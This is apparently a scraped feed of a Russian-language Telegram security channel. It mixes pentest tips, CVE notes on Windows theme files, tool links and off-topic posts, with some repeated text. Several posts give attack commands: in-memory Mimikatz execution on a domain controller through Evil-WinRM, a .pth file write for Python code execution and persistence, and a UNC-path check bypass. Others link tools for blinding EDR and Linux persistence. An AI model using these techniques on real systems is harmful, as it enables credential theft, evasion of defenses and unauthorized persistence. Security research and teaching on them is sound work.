Forwarded from RedTeam brazzers (Миша)
Windows Theme Spoofing
В Windows существуют специальные файлы тем с одноименным расширением
Фактически, это был Built-In Loader. Все основывалось на том, что Explorer.exe, обнаруживая в файле темы специальную ссылку на файл стилей (
На этом исследования Windows Themes не закончились и обнаружилась новая уязвимость — утечка NetNTLM-хеша без необходимости открытия файла тем. Достаточно было зайти в папку с правильно сгенерированным файлом и хеш был в наших руках. Язве был назначен идентификатор CVE-2024-21320, а POC можно найти тут.
Эти две уязвимости могут отлично работать в чейне с Smuggling-техниками.
Патч на CVE-2024-21320 заключался во внедрении проверки на UNC путь функцией
Так родилась CVE-2024-38030, подробного ее разбора не было, но появился POC.
MS чуть исправила функцию и, казалось бы, на этом все, однако, приключения не закончились, и появилась CVE-2025-21308. На нее пока нет ни разбора, ни POCа, но что-то мне подсказывает, что вновь появился способ обхода проверки на UNC путь :)
В Windows существуют специальные файлы тем с одноименным расширением
.themes. Они позволяют кастомизировать систему, применяя новые раскраски, цветовые палитры, шрифты и обои. В 2023 году вышел POC на уязвимость themebleed (POC2), которая как-то не была оценена по достоинству.Фактически, это был Built-In Loader. Все основывалось на том, что Explorer.exe, обнаруживая в файле темы специальную ссылку на файл стилей (
msstyles) , осуществит удаленную загрузку DLL с именем, оканчивающемся на _vrf.dll. Была, конечно, осуществлена проверка подписи, но эту проверку обошли с помощью атаки TOCTOU (Time of Check - Time of Use). При первом обращении на подконтрольный атакующему SMB-сервер происходила передача легитимной библиотеки DLL для осуществления проверок подписи, однако за первым запросом следовал второй (после успешной проверки), на который уже отдавалась вредоносная библиотека. На этом исследования Windows Themes не закончились и обнаружилась новая уязвимость — утечка NetNTLM-хеша без необходимости открытия файла тем. Достаточно было зайти в папку с правильно сгенерированным файлом и хеш был в наших руках. Язве был назначен идентификатор CVE-2024-21320, а POC можно найти тут.
Эти две уязвимости могут отлично работать в чейне с Smuggling-техниками.
Патч на CVE-2024-21320 заключался во внедрении проверки на UNC путь функцией
PathIsUnc() — если путь был на сетевую шару, то Explorer.exe не пытался подгрузить файлы для файла темы. Однако исследователи нашли способ обхода (благодаря статье Google Project Zero), указав UNC Path в ином формате: \??\UNC\ip\share. Так родилась CVE-2024-38030, подробного ее разбора не было, но появился POC.
MS чуть исправила функцию и, казалось бы, на этом все, однако, приключения не закончились, и появилась CVE-2025-21308. На нее пока нет ни разбора, ни POCа, но что-то мне подсказывает, что вновь появился способ обхода проверки на UNC путь :)
Хочу поделиться с вами новостью: я столкнулся с проблемой установки DaVinci Resolve на Kali Linux. 😅
Но есть и хорошие новости! Я наконец-то обновил свое оборудование и принял решение полностью перейти на Linux. 💻🐧
Я потратил около 3 ночей, пытаясь заставить работать DaVinci Resolve на моем новом ноутбуке. Наверное, так бы и не нашел решение, если бы не решил обратиться за помощью к нескольким замечательным людям: Лолечка, Банер и v1mkss.
Я очень благодарен этим людям за поддержку! Единственное, что только один из них не является участником нашего сервера, а сервера Банера. 🤔
--> https://discord.gg/BRRdKVz2zK (небольшая реклама) 📢
И вот, наконец, я смог запустить DaVinci Resolve! 🥳
Надеюсь, что больше не столкнусь с проблемами. 🤞
Спасибо всем за помощь! 🍷
Но есть и хорошие новости! Я наконец-то обновил свое оборудование и принял решение полностью перейти на Linux. 💻🐧
Я потратил около 3 ночей, пытаясь заставить работать DaVinci Resolve на моем новом ноутбуке. Наверное, так бы и не нашел решение, если бы не решил обратиться за помощью к нескольким замечательным людям: Лолечка, Банер и v1mkss.
Я очень благодарен этим людям за поддержку! Единственное, что только один из них не является участником нашего сервера, а сервера Банера. 🤔
--> https://discord.gg/BRRdKVz2zK (небольшая реклама) 📢
И вот, наконец, я смог запустить DaVinci Resolve! 🥳
Надеюсь, что больше не столкнусь с проблемами. 🤞
Спасибо всем за помощь! 🍷
Discord
Join the LiveOne Discord Server!
Check out the LiveOne community on Discord - hang out with 184 other members and enjoy free voice and text chat.
🔥2
Fsecurity | HH pinned «Хочу поделиться с вами новостью: я столкнулся с проблемой установки DaVinci Resolve на Kali Linux. 😅 Но есть и хорошие новости! Я наконец-то обновил свое оборудование и принял решение полностью перейти на Linux. 💻🐧 Я потратил около 3 ночей, пытаясь заставить…»
www.opennet.ru
Релиз минималистичного web-браузера Dillo 3.2.0
Представлен релиз web-браузера Dillo 3.2.0. Браузер предоставляет графический интерфейс на основе вкладок и поддерживает HTML 4.01, CSS и HTTPS (нет поддержки JavaScript). Функциональность Dillo может расширяться через плагины, например, имеются плагины для…
🔗Ссылка:
https://opennet.ru/62585/
https://opennet.ru/62585/
Forwarded from Похек
#threatintelligence #кибербезопасность #TI
Threat Intelligence (TI) — это сбор и анализ информации о киберугрозах, который помогает компаниям предугадывать действия злоумышленников и защищаться заранее.
Почему это важно?
Представьте, что у вас есть данные о том, где, как и когда враг готовится атаковать. TI предоставляет информацию о новых уязвимостях, фишинговых кампаниях, вредоносных программах и тактиках атакующих. Мне эта тема стала интересна давно, причем я на неё смотрю не с точки зрения защиты, а как пентестер.
Как это помогает?
Для blue team: Позволяет обновлять защиту до того, как станет поздно.
Для руководителей: Обучает сотрудников распознавать современные угрозы.
Для CISO: Помогает прогнозировать атаки и снижать потенциальные риски.
Для пентестеров/багхантеров: Максимально быстро узнавать о 0/1 day эксплойтах. Можно развернуть на своих серверах интересное для себя ПО, к примеру VMware Horizon, 1C Bitrix и анализировать как атакуют такие системы.
Threat Intelligence — это не просто аналитика. Это инструмент, который делает вашу защиту проактивной, а не реактивной. По другому это можно сравнить с противостоянием меч и щит. Хакеры всегда затачивают мечи, безопасникам нужно делать щит прочнее. TI позволяет делать щит прочнее, заранее узнав каким мечом тебя ударят.
А вы используете TI в своей практике? Делитесь опытом в комментариях)
Если вам интересна эта тема, ставьте
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1🔥1👏1
Используйте законный драйвер вызова WFP для предотвращения отправки телеметрии агентами EDR
🔗Ссылка:
https://github.com/senzee1984/EDRPrison
🔗Ссылка:
https://github.com/senzee1984/EDRPrison
GitHub
GitHub - senzee1984/EDRPrison: Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry
Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry - senzee1984/EDRPrison
Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Хабр
Роскомнадзор будет автоматически отслеживать нарушения в обороте персональных данных
Роскомнадзор (РКН) с помощью автоматизированных систем сможет отслеживать нарушения онлайн‑сервисами и компаниями правил обработки персональных данных (ПД). Это следует из проекта...
🔗Ссылка:
https://habr.com/ru/news/874356/
https://habr.com/ru/news/874356/
Forwarded from BugXplorer (j b)
Bug Bounty Recon Series #1: Discover and Map Hidden Endpoints and Parameters
https://www.yeswehack.com/learn-bug-bounty/discover-map-hidden-endpoints-parameters
🪳 @bugxplorer
https://www.yeswehack.com/learn-bug-bounty/discover-map-hidden-endpoints-parameters
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Релиз ядра Linux 6.13
После двух месяцев разработки Линус Торвальдс представил релиз ядра Linux 6.13. Среди наиболее заметных изменений: режим ленивого вытеснения в планировщике задач, поддержка атомарной записи в XFS и Ext4, механизм "multigrain timestamps", адаптивный режим…
🔗Ссылка:
https://opennet.ru/62587/
https://opennet.ru/62587/
Forwarded from SecuriXy.kz
Век живи - век учись...
Интересный встроенный функционал #Evil-WinRM узнал недавно изучая очередной «индусский» курс.
Суть в то, что у Evil-WinRM есть встроенный тулсет доступный через menu.
И есть например - функция Invoke-Mimikatz которая позволяет загружать и выполнять утилиту Mimikatz непосредственно в памяти целевой системы, что снижает вероятность обнаружения антивирусными средствами.
А еще, он поддерживает переменные при выполнении команд, и если нам нужно исполнить скрипт или еще что-то не на целевой заовненной системе, а за ее пределами, например на контроллере домена, без необходимости пробрасывания туннельки - мы можем использовать это для выполнения наших команд безтельно (в памяти).
На примере ниже - исполнение мимикатза из памяти на контролле домена DC через WinRM сессию с пользовательского хоста
Интересный встроенный функционал #Evil-WinRM узнал недавно изучая очередной «индусский» курс.
Суть в то, что у Evil-WinRM есть встроенный тулсет доступный через menu.
И есть например - функция Invoke-Mimikatz которая позволяет загружать и выполнять утилиту Mimikatz непосредственно в памяти целевой системы, что снижает вероятность обнаружения антивирусными средствами.
А еще, он поддерживает переменные при выполнении команд, и если нам нужно исполнить скрипт или еще что-то не на целевой заовненной системе, а за ее пределами, например на контроллере домена, без необходимости пробрасывания туннельки - мы можем использовать это для выполнения наших команд безтельно (в памяти).
На примере ниже - исполнение мимикатза из памяти на контролле домена DC через WinRM сессию с пользовательского хоста
*Evil-WinRM* PS UserHost#> Invoke-Command -computername dc.intranet.poo -scriptblock ${function:Invoke-Mimikatz} -credential $cred
PANIX - это мощная, модульная и легко настраиваемая платформа сохранения данных Linux, предназначенная для исследователей безопасности, инженеров по обнаружению, тестировщиков на проникновение, энтузиастов CTF и многих других. Созданная с учетом универсальности, PANIX делает упор на функциональность, что делает ее незаменимым инструментом для понимания и внедрения широкого спектра методов сохранения данных.
🔗Ссылка:
https://github.com/Aegrah/PANIX
🔗Ссылка:
https://github.com/Aegrah/PANIX
GitHub
GitHub - Aegrah/PANIX: Customizable Linux Persistence Tool for Security Research and Detection Engineering.
Customizable Linux Persistence Tool for Security Research and Detection Engineering. - Aegrah/PANIX
Forwarded from Похек
#tip #tips #bugbounty #nextjs #vercel
Есть небольшой лайфхак, так сказать, который позволяет одномоментно вывести все существующие роуты в NextJS приложении.
В Инструментах разработчика > Консоль >
allow pasting >console.log(__BUILD_MANIFEST.sortedPages.join('\n'));Скрин1 был честно украден из X, т.к. скрины с проекта нельзя показывать, иначе вы слишком быстро поймёте что за компания))
Скрин2, это из моей платформы обучения. Как видите, у меня это уже не работает :)
👩 Работа этой строки очень проста. Берётся __BUILD_MANIFEST, в котором перечисленны все страницы и просто через join их выводим. Работает ли это до сих пор? Да, буквально недавно на одном из проектов попалось это. На главной странице отдавался 404, попытки активно или пассивно профаззить не дали результатов.
Пришлось выйти в интернет с этим вопросом и немного покопаться в документации, чтобы прийти к этой команде. Также ещё по опыту своей разработки и отслеживания как разрабы пишут код, хочу заметить что очень редко отключают console.log, console.error и т.д. на продакшен версиях сайта. А сделать это очень легко:
module.exports = {
compiler: {
removeConsole: process.env.NODE_ENV === "production",
},
};🐇 Есть ещё классное браузерное расширение Next.js Explorer. У меня о нём спрашивали на Bugs Zone. Вот решил напомнить. Оно позволяет показывать какие данные хранятся в приложении. Иногда может подсветить даже какие-то секреты, если они указаны не в .env
На самом деле NextJS очень дырявый, у него относительно часто появляются CVE. Так что приходится следить ещё и за этим)
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from hx0110
Code execution via Site-Specific Configuration Hooks
В статейке нашел очень интересный метод эксплуатации File write to RCE в Python за счет использования функционала site-specific configuration hooks. (Он конечно не новый, но мне показалось очень интересным)
Чтобы получить исполнение необходимо:
1. Записать python код начинающийся с
2. И при пораждении нового процесса питона выполниться код
Подробнее
P.S. Persistence также возможен, так как код исполняется при каждом запуске питона
#web #python #RCE
В статейке нашел очень интересный метод эксплуатации File write to RCE в Python за счет использования функционала site-specific configuration hooks. (Он конечно не новый, но мне показалось очень интересным)
Чтобы получить исполнение необходимо:
1. Записать python код начинающийся с
import или import\t в ~/.local/lib/pythonX.Y/site-packages/arb_name.pth с расширением .pthuser@host:~$ echo 'import os;os.system("whoami>/tmp/x")' > .local/lib/python3.12/site-packages/arbitrary_name.pth2. И при пораждении нового процесса питона выполниться код
user@host:~$ python3
>>> CTRL + D
user@host:~$ cat /tmp/x
user
Подробнее
P.S. Persistence также возможен, так как код исполняется при каждом запуске питона
#web #python #RCE
Sonarsource
Pretalx Vulnerabilities: How to get accepted at every conference
We recently discovered two vulnerabilities in pretalx and found a generic technique to gain code execution from a file write.
GitHub
GitHub - scmanjarrez/CVEScannerV2: Nmap script that scans for probable vulnerabilities based on services discovered in open ports.
Nmap script that scans for probable vulnerabilities based on services discovered in open ports. - scmanjarrez/CVEScannerV2
Скрипт Nmap, который сканирует возможные уязвимости на основе сервисов, обнаруженных в открытых портах.
🔗Ссылка:
https://github.com/scmanjarrez/CVEScannerV2
🔗Ссылка:
https://github.com/scmanjarrez/CVEScannerV2
🔥2